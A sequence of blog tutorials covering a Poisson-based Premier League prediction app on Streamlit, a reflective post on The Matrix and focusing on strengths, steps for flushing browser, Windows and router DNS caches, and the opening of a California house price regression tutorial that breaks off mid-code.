
How I Created a Football Prediction App on Streamlit


This tutorial shows you how I created a model to predict football results using the Poisson distribution. You’ll learn how I designed an interactive dashboard on Streamlit where users can select the teams and get the odds of a home win, draw, or away win.

Here’s a live demo of using the app to predict different games, such as Arsenal vs. Southampton:

The purpose of this tutorial is purely educational: to introduce you to some concepts in Python. Using this app for anything else, for example to compare bookmakers’ odds and place a stake, is entirely at your own risk.

We will be predicting the English Premier League, as it’s the most-watched football league in the world.

Poisson Distribution

Speaking in a football context, how likely will a match result in a win or draw within 90 minutes of gameplay? If it’s to result in a win, what are the chances of a team scoring 3 goals with a clean sheet?

That is exactly the kind of question a Poisson distribution helps to answer.

ℹ Info: A Poisson distribution is a type of probability distribution that helps to calculate the chance of a certain number of events happening in a given space or time period. It considers the average rate of these events and assumes they are independent of each other.
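As a rough illustration of the definition above, the Poisson probability of seeing exactly k events when the average rate is lam equals lam**k * exp(-lam) / k!. The sketch below uses only the standard library; the function name poisson_pmf and the rate of 1.6 goals per match are illustrative assumptions, not values taken from the dataset.

```python
from math import exp, factorial

def poisson_pmf(k, lam):
    """Probability of exactly k events when the average rate is lam."""
    return lam ** k * exp(-lam) / factorial(k)

# Assumed average of 1.6 goals per match, purely for illustration.
rate = 1.6
for goals in range(5):
    print(f"P({goals} goals) = {poisson_pmf(goals, rate):.3f}")

# The probabilities over all possible goal counts add up to 1.
total = sum(poisson_pmf(k, rate) for k in range(50))
print(round(total, 6))
```

Notice that the average rate is the only input the function needs besides the goal count.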

So, here are our assumptions:

  1. Events are independent of each other. This means that if Tottenham were to pack the box, it would not prevent Manchester City from scoring against them in a match.
  2. Two events cannot occur at exactly the same time. This means that if Chelsea were to score a goal, it would not result in an instant equalizer.
  3. The number of events occurring in a given time interval can be counted. This means we can say precisely how many times Liverpool will commit a painful mistake that gifts their rival the trophy.

As the examples above show, these assumptions do not always hold in real-life situations, which limits how much the Poisson distribution can tell us. Despite these inherent limitations, we can still draw insight from the model and see whether it can form a basis for further research into predictive football models.

Sparing you the theory and mathematical formulas, let’s get down to business and see how we can implement the Poisson distribution using Python.

The Dataset

We will import match results from the English Premier League (EPL). There are various sources for this data, including Kaggle [1], GitHub [2], and a football API [3]. But we will source our data from football-data.co.uk [4].

⚽ At the point of writing, the EPL has gone halfway. It is now becoming more interesting than when it commenced. Arsenal’s dramatic resurgence means they are seen by many as favorites to win the crown. Manchester City are relentlessly in hot pursuit, especially with the arrival of Erling Haaland. Newcastle have become a surprising contender for the title.

On the other hand, Chelsea is nowhere to be found in the Champions League places, and neither is Liverpool. This shows that football is unpredictable. Hence, using the past to predict the future may not yield the expected results.

Furthermore, some Premier League clubs have undergone dramatic changes, from changes of ownership to managerial changes to the transfer of players in and out of the competition. All of this makes football prediction very difficult.

For these and other reasons, I used only the data from the current season to train the model.

import pandas as pd
data = pd.read_csv('https://www.football-data.co.uk/mmz4281/2223/E0.csv')
print(data.shape)
# (199, 106)

We will not save the data. Instead, it is read from the source each time, so the predictions are always based on the latest results. The data has 106 columns, but we are only interested in 4 of them.

Let’s select and rename them.

epl = data[['HomeTeam', 'AwayTeam','FTHG', 'FTAG']]
epl = epl.rename(columns={'FTHG': 'HomeGoals', 'FTAG':'AwayGoals'})
print(epl.head())

Output:

 HomeTeam AwayTeam HomeGoals AwayGoals
0 Crystal Palace Arsenal 0 2
1 Fulham Liverpool 2 2
2 Bournemouth Aston Villa 2 0
3 Leeds Wolves 2 1
4 Newcastle Nott'm Forest 2 0

We want to compare our predictions with live results. So, we will reserve the last 20 rows representing two game weeks. Then we see if we can draw insights from the home and away goals.

test = epl[-20:]
epl = epl[:-20]
print(epl[['HomeGoals', 'AwayGoals']].mean())

Output:

HomeGoals 1.631285
AwayGoals 1.217877
dtype: float64

We now have 179 rows and 4 columns. You can see that, on average, the home team scores more goals than the away team but only by a small margin.

This information is vital. If an event follows a Poisson distribution, the mean, also known as lambda, is the only thing we need to know to find the probability of that event occurring a certain number of times.

A Skellam distribution describes the difference between two independent Poisson-distributed variables (the home and away goals in our case), each defined by its own mean.

We can then calculate the probability mass function (PMF) of a Skellam distribution using the mean goals to determine the probability of a draw or of a win by a given margin.

from scipy.stats import skellam, poisson

# probability of a draw
skellam.pmf(0.0, epl.HomeGoals.mean(), epl.AwayGoals.mean())
# Output: 0.24434197359198495

# probability of a home win by one goal
skellam.pmf(1.0, epl.HomeGoals.mean(), epl.AwayGoals.mean())
# Output: 0.22500333061251618

The result shows that the probability of a draw in the EPL is about 24%, while the probability of a home win by exactly one goal is about 22.5%. Remember, this combines all the matches. We will follow the same process to model specific matches.
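To see what skellam.pmf is doing, here is a minimal standard-library sketch that adds up the joint Poisson probabilities of every scoreline with a given goal difference. The function names and the cut-off of 30 goals per side are assumptions made for illustration; the two means are the rounded values printed earlier, so the results should land close to the scipy outputs above rather than match them digit for digit.

```python
from math import exp, factorial

def poisson_pmf(k, lam):
    """Probability of exactly k goals when the average is lam."""
    return lam ** k * exp(-lam) / factorial(k)

def goal_difference_pmf(diff, home_mean, away_mean, max_goals=30):
    """P(home goals - away goals == diff), truncated at max_goals per side."""
    total = 0.0
    for away in range(max_goals + 1):
        home = away + diff
        if 0 <= home <= max_goals:
            total += poisson_pmf(home, home_mean) * poisson_pmf(away, away_mean)
    return total

# Mean home and away goals printed earlier in this tutorial (rounded).
home_mean, away_mean = 1.631285, 1.217877

draw = goal_difference_pmf(0, home_mean, away_mean)
home_by_one = goal_difference_pmf(1, home_mean, away_mean)
print(f"draw: {draw:.4f}, home win by one: {home_by_one:.4f}")
```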

Data Preparation

Before we begin building the model, let’s first prepare our data, making it suitable for modeling.

home = epl.iloc[:,0:3].assign(home=1).rename(columns={'HomeTeam':'team', 'AwayTeam':'opponent', 'HomeGoals':'goals'})
away = epl.iloc[:, [1, 0, 3]].assign(home=0).rename(columns={'AwayTeam': 'team', 'HomeTeam': 'opponent', 'AwayGoals': 'goals'})
df = pd.concat([home, away])
print(df)

Output:

 team opponent goals home
0 Crystal Palace Arsenal 0 1
1 Fulham Liverpool 2 1
2 Bournemouth Aston Villa 2 1
3 Leeds Wolves 2 1
4 Newcastle Nott'm Forest 2 1
.. ... ... ... ...
174 Tottenham Crystal Palace 4 0
175 Man City Chelsea 1 0
176 Chelsea Fulham 1 0
177 Leeds Aston Villa 1 0
178 Man City Man United 1 0

[358 rows x 4 columns]

We wanted to merge everything that represents home and away into a single set of columns.

So we selected the relevant columns for each side, gave them the same names, and then concatenated them.

To differentiate away goals from home goals, we created a column and assigned 1 to represent home goals and 0 for away goals. Our data is now suitable for modeling.

The Generalized Linear Model

The generalized linear model (GLM) is a family of models that includes the linear regression and logistic regression models we use in machine learning. It is used to model different types of data. Poisson regression, a member of this family, is used to analyze count data.

Remember, we are dealing with count data: the number of goals per match. Since count data is commonly modeled with a Poisson distribution, we will use Poisson regression to build our model.

import statsmodels.api as sm
import statsmodels.formula.api as smf

formula = 'goals ~ team + opponent + home'
model = smf.glm(formula=formula, data=df, family=sm.families.Poisson()).fit()
print(model.summary())

We imported the statsmodels library to help us build the model.

The formula models the number of goals as a combination of the team, the opponent, and whether the team is playing at home. Take a look at the summary. The output of the generalized linear model contains more than we can explain in this article.

But let’s focus on the coef column.

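Each coefficient is on a log scale and is measured relative to a baseline team that the model leaves out of the table. In the team rows, a positive value means the team scores more than the baseline (a stronger attack), and a negative value means it scores less. In the opponent rows, a positive value means the team concedes more than the baseline (a weaker defense), while a negative value indicates a stronger defense. A value close to 0 means the team is about as strong as the baseline. The home coefficient captures home advantage: a positive value means teams score more at home than away.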
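The values in the coef column are on a log scale, because Poisson regression uses a log link by default. Here is a minimal sketch of how such coefficients combine into an expected number of goals. All the numbers below are hypothetical and are not taken from the fitted model’s summary.

```python
from math import exp

# Hypothetical coefficients, NOT taken from the fitted model's summary.
intercept = 0.30
team_coef = 0.20       # attacking strength of the scoring team
opponent_coef = -0.10  # effect of the defending team on goals conceded
home_coef = 0.25       # home advantage

def expected_goals(intercept, team_coef, opponent_coef, home_coef, at_home):
    """Log link: add the terms on the log scale, then exponentiate."""
    log_rate = intercept + team_coef + opponent_coef + home_coef * at_home
    return exp(log_rate)

at_home = expected_goals(intercept, team_coef, opponent_coef, home_coef, 1)
away = expected_goals(intercept, team_coef, opponent_coef, home_coef, 0)
print(f"expected goals at home: {at_home:.3f}, away: {away:.3f}")

# exp(home_coef) is the multiplicative effect of playing at home.
print(f"home multiplier: {exp(home_coef):.3f}")
```

Because the terms add up before exponentiation, each coefficient acts as a multiplier on the expected goals rather than as a fixed number of extra goals.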

Having trained the model, we can now use it to make predictions. Let’s create a function to do so.

import numpy as np

def predict_match(model, homeTeam, awayTeam, max_goals=10):
    # expected goals for the home side
    home_goals = model.predict(pd.DataFrame(data={'team': homeTeam, 'opponent': awayTeam, 'home': 1}, index=[1])).values[0]
    # expected goals for the away side
    away_goals = model.predict(pd.DataFrame(data={'team': awayTeam, 'opponent': homeTeam, 'home': 0}, index=[1])).values[0]
    # probability of each side scoring 0..max_goals goals
    pred = [[poisson.pmf(i, team_avg) for i in range(0, max_goals+1)] for team_avg in [home_goals, away_goals]]
    # rows: home goals, columns: away goals
    return np.outer(np.array(pred[0]), np.array(pred[1]))

The function has four parameters:

  • the Poisson model to be used to make the predictions,
  • the home team,
  • the away team, and
  • the maximum number of goals.

We set the maximum to 10 by default, as a practical upper limit on what a team can score within 90 minutes of gameplay. Remember, the formula combines the team, the opponent, and the home indicator to predict the number of goals.

We looped over the predicted number of home and away goals and, for each, over every goal count from 0 up to the maximum.

In each iteration, we calculate the probability mass function of the Poisson distribution. This tells us the probability of a team scoring a given number of goals. Taking the outer product of the two sets of probabilities, the function creates and returns a matrix.

Suppose Arsenal and Manchester City are to face each other at the Emirates Stadium and you want to make a prediction.

print(model.predict(pd.DataFrame(data={'team': 'Arsenal', 'opponent': 'Man City', 'home':1}, index=[1])))

Output:

1 2.026391
dtype: float64

The model is predicting Arsenal to score two goals…

print(model.predict(pd.DataFrame(data={'team': 'Man City', 'opponent': 'Arsenal', 'home':0}, index=[1])))

Output:

1 1.284658
dtype: float64

… and Manchester City to score 1.28 goals, for a total of approximately 3 goals in the match.

The model roughly predicts a 2-1 home win for Arsenal.

Now that the three members of the formula are complete, we can feed it to the predict_match() function to get the odds of a home win, away win, and a draw.

ars_man = predict_match(model, 'Arsenal', 'Man City', max_goals=3)

Result:

array([[0.03647786, 0.04686159, 0.03010057, 0.01288965],
       [0.07391843, 0.09495992, 0.06099553, 0.02611947],
       [0.07489383, 0.09621298, 0.06180041, 0.02646414],
       [0.05058807, 0.06498838, 0.04174394, 0.01787557]])

The rows and columns represent Arsenal’s and Manchester City’s chances of scoring a particular number of goals, respectively.

The diagonal entries represent a draw since it is where both teams score the same number of goals. Below the line (the lower triangle of the array found using numpy.tril) is Arsenal’s victory, and above (the upper triangle of the array found using numpy.triu) is Man City’s.

Let’s automate this with Python.

import numpy as np

# victory for Arsenal
np.sum(np.tril(ars_man, -1)) * 100
# 40.23456259724963

# victory for Man City
np.sum(np.triu(ars_man, 1)) * 100
# 20.34309498981432

# a draw
np.sum(np.diag(ars_man)) * 100
# 21.111376045176485

Our model tells us that Arsenal has a 40% chance of winning, roughly double Man City’s 20%, with a 21% chance of a draw. That is consistent with the earlier prediction of 2-1.
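The three percentages above add up to about 82% rather than 100%, because max_goals=3 cuts off every scoreline in which either side scores more than three. The standard-library sketch below recomputes the split from the two expected-goals values printed earlier and repeats it with a cap of 10, where the total comes out very close to 1. The function names are illustrative and this is not the code from the app.

```python
from math import exp, factorial

def poisson_pmf(k, lam):
    """Probability of exactly k goals when the average is lam."""
    return lam ** k * exp(-lam) / factorial(k)

def outcome_probabilities(home_rate, away_rate, max_goals):
    """Return (home win, draw, away win) for scorelines up to max_goals."""
    home_win = draw = away_win = 0.0
    for h in range(max_goals + 1):
        for a in range(max_goals + 1):
            p = poisson_pmf(h, home_rate) * poisson_pmf(a, away_rate)
            if h > a:
                home_win += p   # below the diagonal of the matrix
            elif h == a:
                draw += p       # on the diagonal
            else:
                away_win += p   # above the diagonal
    return home_win, draw, away_win

# Expected goals predicted above for Arsenal (home) and Man City (away).
arsenal, man_city = 2.026391, 1.284658

for cap in (3, 10):
    hw, d, aw = outcome_probabilities(arsenal, man_city, cap)
    print(f"max_goals={cap}: home {hw:.3f}, draw {d:.3f}, away {aw:.3f}, total {hw + d + aw:.3f}")
```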

Feel free to compare your predictions with the test data and see how close they come to the actual results. We can now proceed to create a football prediction app on Streamlit.

Check my GitHub page to see the full script.

Check out the live demo app to play with it!

Streamlit Dashboard

In the file named app.py, you will see how I used st.sidebar.selectbox to display a list of all the clubs in the Premier League. This will appear on the left-hand side. Since the names of the club appeared twice, I made sure that only one was selected for prediction.

The rest of the code has been explained. If the button is pressed, the get_scores() function is executed and displays the prediction results.

👉 Recommended: Streamlit Button — Ultimate Guide with Video

Notice that I didn’t save the dataset.

Whenever the app is opened, it fetches the latest results and retrains the model before the next prediction. Also, since not all of the code is wrapped in functions, the order of the statements matters.

That is why the get_scores() function was called last. Of course, there are many ways to write the code and get the same result.
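The exact code lives in app.py. As a hedged sketch of one way to build the options for the two select boxes, assume the goal is to list each club once and to keep the same club from being picked for both sides. The helper name team_options and the sample rows are hypothetical.

```python
def team_options(home_column, exclude=None):
    """Sorted list of unique club names, optionally leaving one club out."""
    teams = sorted(set(home_column))
    return [t for t in teams if t != exclude]

# A few rows of the HomeTeam column, with repeats as in the real data.
home_column = ["Arsenal", "Fulham", "Leeds", "Arsenal", "Fulham", "Newcastle"]

home_choices = team_options(home_column)
# In the app, a list like this would be passed to st.sidebar.selectbox.
home_team = home_choices[0]
away_choices = team_options(home_column, exclude=home_team)

print(home_choices)
print(away_choices)
```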

A Word of Caution

I made it clear from the beginning that this article is for educational purposes only and should not be used for anything else.

Many things that can affect the result of a match are not taken into consideration by the model: a change of manager, injuries, refereeing decisions, player fitness, team morale, and weather conditions, on top of the limitations of the Poisson distribution used to make these predictions.

Of course, no model is perfect. So, use responsibly.

Prediction Result

I deployed the app on Streamlit Cloud and tried to predict upcoming matches in the English Premier League.

The results were amazing. You can give it a try. I don’t expect the Premier League clubs to produce exactly those scores, since a predicted result is not always the same as the actual result. But I will consider the model to have performed well if some, if not all, of the home wins, draws, or away wins are predicted correctly.

Conclusion

We have learned a lot today, ranging from data manipulation to model building.

You learned how to make football predictions using the Poisson distribution. I did my best to keep the explanation simple by leaving the mathematical theory and calculations aside. If you want to know more, you have the internet at your disposal. Alright, have a nice day.

👉 Recommended: How I Built a House Price Prediction App Using Streamlit

Resources

  1. https://www.kaggle.com/hugomathien/soccer
  2. https://github.com/jalapic/engsoccerdata
  3. http://api.football-data.org/index
  4. http://www.football-data.co.uk/englandm.php
  5. https://jonaben1-football-prediction-app-nlr1w7.streamlit.app

What ChatGPT Thinks About The Matrix – Do This to Break Free!


With delight, my wife and I realized that our daughter was now old enough to watch the Matrix Trilogy.

If you don’t know the story, here’s a short recap:

😎 Story Recap: The Matrix Trilogy tells the story of Neo, a computer hacker who discovers that the world he knows is actually an elaborate virtual reality created by sentient machines. He joins a group of rebels led by Morpheus and Trinity, who have discovered the truth about the Matrix and are fighting to free humanity from its control. In order to save humanity, Neo must battle the machines and their agents, including the ruthless Agent Smith. Ultimately, Neo must make the ultimate sacrifice to save humanity from the machines.

Last night we finished the third movie, and as these things go, we discussed the deeper meaning of the movie and how it applies to our real world.

What Is Real?

Prof. Yuval Harari frequently points out that the “real world” is a web of fictional stories, such as:

  • Money,
  • Nations,
  • Monday-Friday,
  • Marriages,
  • Social classes,
  • Laws,
  • Corporations, and
  • Ideological power hierarchies.

Yuval Harari believes that stories are a powerful tool for humans to make sense of their lives and the world around them.

He argues that stories provide a sense of identity, purpose, and belonging and that they can be used to shape our values and beliefs. Harari believes that stories have been essential for humanity’s success, and that they have been used to provide a narrative for our actions and a framework for our decisions.

He stresses the importance of questioning the stories we tell ourselves, and of being aware of the stories that are told to us by others.

🆗 Reality Test: Harari provides a solid test to check if something is fiction or reality. Ask: can it suffer? The answer reveals whether “it” is real or a story. For example, money cannot suffer, so it must be a story or ideology. However, a human being or an animal can suffer so they must be real, according to the suffering test.

My daughter loves this stuff.

A Story of Individualism – What ChatGPT Thinks About The Matrix

Weaponized with the most powerful invention of humankind (ChatGPT), we tried to confirm the meaning of the Matrix idea – what is the truth beyond the matrix?

Here’s ChatGPT’s deep answer (IQ 500):

🤖 ChatGPT: “The truth beyond the Matrix is the power of the individual. It’s the power to choose our own paths, to pursue our own dreams, and live life on our own terms. It’s the power to be true to ourselves, to be in control of our own destiny, and to be free from the confines of the system. It’s the freedom to be who we truly are, without fear or judgement, and to live life with purpose and joy.”

The evil Agent Smith tries to copy and paste its own infectious DNA to homogenize all citizens of the Matrix. His counterpart Neo wants to give freedom and individualism to all people, so they can embrace their individual strengths and weaknesses.

Embrace Your Strengths to Set You Free

I think this is a lesson worth holding on to – embrace your strengths and quirks because they make you human. Profoundly, only your strengths can accelerate your career and bring you success.

Famous management consultant Peter Drucker says it best: You can only perform from your strengths.

👉 Recommended: 26 Tips to Triple or Quadruple Your Income as a Freelance Developer

Today you can decide to focus on your few strengths and passions and push them to higher highs – or you can decide to focus on improving your thousands of weaknesses.

You are given limited time and energy, so you can’t do both. Red pill, blue pill.

The most successful individuals are those who have embraced their strengths and used them to their advantage for many reasons. Here are three good ones:

Firstly, focusing on your strengths rather than weaknesses allows you to pursue your passions and interests. It is important to recognize your strengths and work to develop them because they are what set you apart from others and make you unique. By embracing your strengths and working on them, you can create a career path that suits you and your interests. This will help you to stay motivated and inspired, ultimately leading to more success and satisfaction in your life.

Secondly, focusing on your strengths rather than weaknesses allows you to be more productive. When you focus on your weaknesses, you waste time and energy trying to improve them. Instead, you should focus on what you are already good at, as this will help you to be more efficient and effective. This will help you to reach your goals faster and more successfully.

Lastly, embracing your strengths rather than trying to even out all your weaknesses can help you to build self-confidence. When you focus on your strengths, you become aware of the skills and abilities you possess. This can help you to believe in your own capabilities and trust yourself. This is important, as having self-confidence is essential for achieving success in life.

It is more important to embrace your strengths rather than to even out all your weaknesses. This is because it allows you to pursue your passions, become more productive, and build self-confidence.

👉 Decide whether you want to be average, if you’re lucky, at many things or excellent at a few.

To your freedom! 🚀

Chris


This story was originally published in one of my programming newsletters to my students.


How to Flush Your Cache on Windows and Router


I work a lot with DNS settings for my websites and apps.

Today I added a few new DNS entries to set up a new server. I used DNS propagation checkers and confirmed that the DNS entries were already updated internationally. But unfortunately, I myself couldn’t access the website on my Windows machine behind my Wifi router. I could, however, access the website with my smartphone after switching off Wifi there.

This left only one conclusion: My browser, Windows OS, or router cached the stale DNS entries.

So the natural question arises:

💬 Question: How to flush your browser cache, Windows cache, and router cache and reset the DNS entries so they’ll be loaded freshly from the name servers?

I’ll answer these three subproblems one by one in this short tutorial:

  • Step 1: Flush your browser DNS cache (Chrome, Edge, Firefox)
  • Step 2: Flush your Windows DNS cache
  • Step 3: Flush your router DNS cache

Let’s dive into each of them one by one!

Step 1: Reset Your Browser Cache

First, reset your browser cache because it may store some DNS entries. I’ll show you how to flush your browser cache for the three most popular browsers on Windows:

  • Chrome
  • Edge
  • Firefox

Here’s how! 👇

Clear Cache In Chrome

  1. Open Chrome
  2. At the top right, click More (the three vertical dots)
  3. Click More tools > Clear browsing data
  4. Choose a time range. To flush everything, select All time
  5. Check boxes next to Cookies and other site data and Cached images and files
  6. Click Clear data


Clear Cache In Microsoft Edge

Go to Settings > Privacy, search, and services > scroll down > click Choose what to clear > Change the Time range and check boxes next to Cookies and other site data and Cached images and files. Then click Clear now.


Clear Cache In Firefox

Click the menu button (three horizontal bars) and select Settings > Privacy & Security. Scroll down to the Cookies and Site Data section and click Clear Data. Remove the check mark in front of Cookies and Site Data so that only Cached Web Content is checked. Click the Clear button.


Now your browser has no stale DNS entries — but in my case, this didn’t fix the problem. After all, your operating system may have cached it first!

Step 2: Reset Your Windows OS Cache

There’s a long and a short answer to the question of how to flush the Windows operating system cache. In my case, the short answer worked, but you may want to use the long answer instead if you absolutely need to make sure your Windows DNS cache is empty.

How to Flush Your Windows Cache (Short Answer)

Type cmd into the Windows search field and press Enter. Type “ipconfig /flushdns” and press Enter.

How to Flush Your Windows Cache (Long Answer)

  • Type cmd into the Windows search field and press Enter.
  • Type “ipconfig /flushdns” and press Enter.
  • Type “ipconfig /registerdns” and press Enter.
  • Type “ipconfig /release” and press Enter.
  • Type “ipconfig /renew” and press Enter.
  • Type “netsh winsock reset” and press Enter.
  • Restart the computer.
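If you run these steps often, the commands above can be collected in a small script. The sketch below is an assumption about how one might do that in Python, not part of the original steps: by default it only prints what it would run, and it calls the commands only on Windows with dry_run=False. Some of the commands may need an elevated (administrator) prompt, and you still have to restart the computer yourself afterwards.

```python
import platform
import subprocess

# The commands from the long answer, in the same order.
FLUSH_COMMANDS = [
    ["ipconfig", "/flushdns"],
    ["ipconfig", "/registerdns"],
    ["ipconfig", "/release"],
    ["ipconfig", "/renew"],
    ["netsh", "winsock", "reset"],
]

def flush_windows_dns(dry_run=True):
    """Print each command; actually run it only on Windows with dry_run=False."""
    handled = []
    for command in FLUSH_COMMANDS:
        line = " ".join(command)
        if dry_run or platform.system() != "Windows":
            print("would run:", line)
        else:
            subprocess.run(command, check=False)
        handled.append(line)
    return handled

commands = flush_windows_dns()  # dry run: nothing is changed
```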

    Step 3: Reset Your Router Cache

    This one is simple (although a bit time-consuming): to reset your router’s DNS cache, unplug your router and leave it unplugged for 30 seconds or more. Done!


    How I Built a House Price Prediction App Using Streamlit


    In this tutorial, I will take you through a machine learning project on House Price prediction with Python. We have previously learned how to solve a classification problem.

    👉 Recommended: How I Built and Deployed a Python Loan Eligibility Prediction App on Streamlit

    Today, I will show you how to solve a regression problem and deploy it on Streamlit Cloud.

    You can find an app prototype to try out here:

    What Is Streamlit?

    💡 Info: Streamlit is a popular choice for data scientists looking to deploy their apps quickly because it is easy to set up and is compatible with data science libraries. We are going to set up the dashboard so that when our users fill in some details, it will predict the price of a house.

    But you may wonder:

    Why Is House Price Prediction Important?

    Well, house prices are an important reflection of the economy. The price of a property is important in real estate transactions as it provides information to stakeholders, including real estate agents, investors, and developers, to enable them to make informed decisions.

    Governments also use such information to formulate appropriate regulatory policies. Overall, it helps all parties involved to determine the selling price of a house. With such information, they will then decide when to buy or sell a house.

    We will use machine learning with Python to try to predict the price of a house. Background knowledge of Python and its use in machine learning is a prerequisite for this tutorial.

    👉 Recommended: Python Crash Course (Blog + Cheat Sheets)

    To keep things simple, we will not be dealing with data visualization.

    The Datasets

    We will be using the California Housing Data of 1990 to make this prediction. You can get the dataset on Kaggle or on my GitHub page. Let’s load it using the Pandas library and find the number of rows and columns.

    import pandas as pd

    data = pd.read_csv('housing.csv')
    print(data.shape)
    # (20640, 10)

    We can see the dataset has 20640 rows and 10 columns.

    Let’s get more information about the columns using the .info() method.

    data.info()

    Output:

    <class 'pandas.core.frame.DataFrame'>
    RangeIndex: 20640 entries, 0 to 20639
    Data columns (total 10 columns):
     #   Column              Non-Null Count  Dtype
    ---  ------              --------------  -----
     0   longitude           20640 non-null  float64
     1   latitude            20640 non-null  float64
     2   housing_median_age  20640 non-null  float64
     3   total_rooms         20640 non-null  float64
     4   total_bedrooms      20433 non-null  float64
     5   population          20640 non-null  float64
     6   households          20640 non-null  float64
     7   median_income       20640 non-null  float64
     8   median_house_value  20640 non-null  float64
     9   ocean_proximity     20640 non-null  object
    dtypes: float64(9), object(1)
    memory usage: 1.6+ MB
    
    1. The longitude indicates how far west a house is while the latitude shows how far north the house is.
    2. The housing_median_age indicates the median age of a building. A lower number tells us that the house is newly constructed.
    3. The total_rooms and total_bedrooms indicate the total number of rooms and bedrooms within a block.
    4. The population tells us the number of people within a block, while households tells us the number of households (groups of people living within a home unit) in a block.
    5. The median_income is measured in tens of thousands of US Dollars. It shows the median income of households living within a block.
    6. The median_house_value is also measured in US Dollars. It is the median house value for households living in one block.
    7. The ocean_proximity tells us how close to the sea a house is located.

    Every column has the same number of non-null values except total_bedrooms, which indicates the presence of missing values. All columns are of float datatype except ocean_proximity, which is categorical even though it is shown as object. Let us first confirm this.

    data.ocean_proximity.value_counts()

    Output:

    <1H OCEAN 9136
    INLAND 6551
    NEAR OCEAN 2658
    NEAR BAY 2290
    ISLAND 5
    Name: ocean_proximity, dtype: int64

    It is categorical. So, we have to convert ocean_proximity to an int datatype using LabelEncoder from the Scikit-learn library.

    from sklearn.preprocessing import LabelEncoder

    label_encoder = LabelEncoder()
    obj = (data.dtypes == 'object')
    for col in list(obj[obj].index):
        data[col] = label_encoder.fit_transform(data[col])
    

    Let’s check to confirm.

    data.ocean_proximity.value_counts()

    Output:

    0 9136
    1 6551
    4 2658
    3 2290
    2 5
    Name: ocean_proximity, dtype: int64
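LabelEncoder numbers the categories in sorted order, which is why <1H OCEAN becomes 0 and ISLAND becomes 2 in the output above. Here is a pure-Python sketch of the same mapping; the variable names are illustrative.

```python
# The five categories found in the ocean_proximity column.
categories = ["NEAR BAY", "<1H OCEAN", "INLAND", "NEAR OCEAN", "ISLAND"]

# Sorting the unique labels and numbering them reproduces the codes shown above.
mapping = {label: code for code, label in enumerate(sorted(set(categories)))}

for label, code in mapping.items():
    print(code, label)
```

A dashboard that lets users pick a category by name can use such a mapping to turn the choice back into the integer the model was trained on.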

    Take note of the way LabelEncoder ordered the values. We will need this mapping when creating our Streamlit dashboard. We then fill in the missing values with the mean of their respective columns.

    for col in data.columns:
        data[col] = data[col].fillna(data[col].mean())
    print(data.isna().sum())

    Output:

    longitude 0
    latitude 0
    housing_median_age 0
    total_rooms 0
    total_bedrooms 0
    population 0
    households 0
    median_income 0
    median_house_value 0
    ocean_proximity 0
    dtype: int64

    Having confirmed that there are no missing values, we can now proceed to the next step.

    Standardizing the Data

    If you take a glimpse of our data using the .head() method, you will observe that the data is of differing scales.

    This will affect the model’s ability to perform accurate predictions.

    Hence, we will have to standardize our data using StandardScaler from Scikit-learn. Also, to prevent data leakage, we will make use of pipelines.
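To make the idea concrete, here is a standard-library sketch of what standardizing does: subtract the mean and divide by the standard deviation. It also shows the rule that prevents data leakage, namely learning those two statistics from the training part only and reusing them on unseen data. The numbers and function names are made up for illustration.

```python
from statistics import mean, pstdev

def fit_scaler(values):
    """Learn the mean and population standard deviation from training data."""
    return mean(values), pstdev(values)

def transform(values, mu, sigma):
    """Rescale values using statistics learned elsewhere."""
    return [(v - mu) / sigma for v in values]

# Made-up numbers standing in for one feature, e.g. total_rooms.
train = [880.0, 7099.0, 1467.0, 1274.0, 1627.0]
test = [919.0, 2535.0]

mu, sigma = fit_scaler(train)              # statistics come from the training part only
train_scaled = transform(train, mu, sigma)
test_scaled = transform(test, mu, sigma)   # the same statistics are reused on unseen data

print([round(v, 3) for v in train_scaled])
print([round(v, 3) for v in test_scaled])
```

Putting the scaler inside a Pipeline applies the same rule automatically within every cross-validation fold.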

    The Models

    We have no idea which algorithm or model will perform well in this regression problem.

    A test will be carried out on different algorithms using default tuning parameters. We will use 10-fold cross-validation to design our test harness and evaluate the models using the R Squared metric.

    💡 Info: The R Squared metric is an indication of goodness of fit. The closer to 1 the better: a value of 1 means a perfect fit, a value of 0 means the model does no better than always predicting the mean, and a negative value means it does worse.
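As a small worked example, R Squared is one minus the ratio of the residual sum of squares to the total sum of squares. The sketch below uses made-up house values. It also shows that the score can drop below 0 when a model fits worse than always predicting the mean, which is what the SVR score later in this tutorial reflects.

```python
def r_squared(y_true, y_pred):
    """1 - (residual sum of squares / total sum of squares)."""
    mean_true = sum(y_true) / len(y_true)
    ss_res = sum((t - p) ** 2 for t, p in zip(y_true, y_pred))
    ss_tot = sum((t - mean_true) ** 2 for t in y_true)
    return 1 - ss_res / ss_tot

# Made-up house values, for illustration only.
actual = [100.0, 200.0, 300.0, 400.0]

print(r_squared(actual, actual))                        # perfect fit: 1.0
print(r_squared(actual, [250.0] * 4))                   # always predicting the mean: 0.0
print(r_squared(actual, [400.0, 300.0, 200.0, 100.0]))  # worse than the mean: -3.0
```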

    K-fold cross-validation works by splitting the dataset into several parts (10 folds in our case).

    The algorithm is trained repeatedly, each time on all folds but one, with the remaining fold held back for testing. We chose this approach over relying on a single train_test_split evaluation because it gives a more reliable result, as the model is trained and evaluated repeatedly on different data.
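Here is a minimal pure-Python sketch of how consecutive, unshuffled folds can be cut from a dataset. It mirrors the idea behind KFold rather than reproducing its implementation, and the function name k_fold_indices is hypothetical.

```python
def k_fold_indices(n_samples, n_splits):
    """Yield (train_indices, test_indices) for consecutive, unshuffled folds."""
    indices = list(range(n_samples))
    base, extra = divmod(n_samples, n_splits)
    start = 0
    for fold in range(n_splits):
        # The first `extra` folds get one more sample when the split is uneven.
        size = base + (1 if fold < extra else 0)
        test = indices[start:start + size]
        train = indices[:start] + indices[start + size:]
        yield train, test
        start += size

# 10 samples and 5 folds keep the printout short; the tutorial uses 10 folds.
for train, test in k_fold_indices(10, 5):
    print("train:", train, "test:", test)
```

Every sample lands in the test fold exactly once, so each score is computed on data the model did not see during that round of training.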

    from sklearn.svm import SVR
    from sklearn.neighbors import KNeighborsRegressor
    from sklearn.tree import DecisionTreeRegressor
    from sklearn.linear_model import LinearRegression, Lasso, ElasticNet
    from sklearn.model_selection import KFold, cross_val_score, train_test_split
    from sklearn.pipeline import Pipeline
    from sklearn.preprocessing import StandardScaler
    import bz2

    # assumption: the target is median_house_value and every other column is a feature
    x = data.drop('median_house_value', axis=1)
    y = data['median_house_value']

    pipelines = []
    pipelines.append(('ScaledLR', Pipeline([('Scaler', StandardScaler()), ('LR', LinearRegression())])))
    pipelines.append(('ScaledLASSO', Pipeline([('Scaler', StandardScaler()), ('LASSO', Lasso())])))
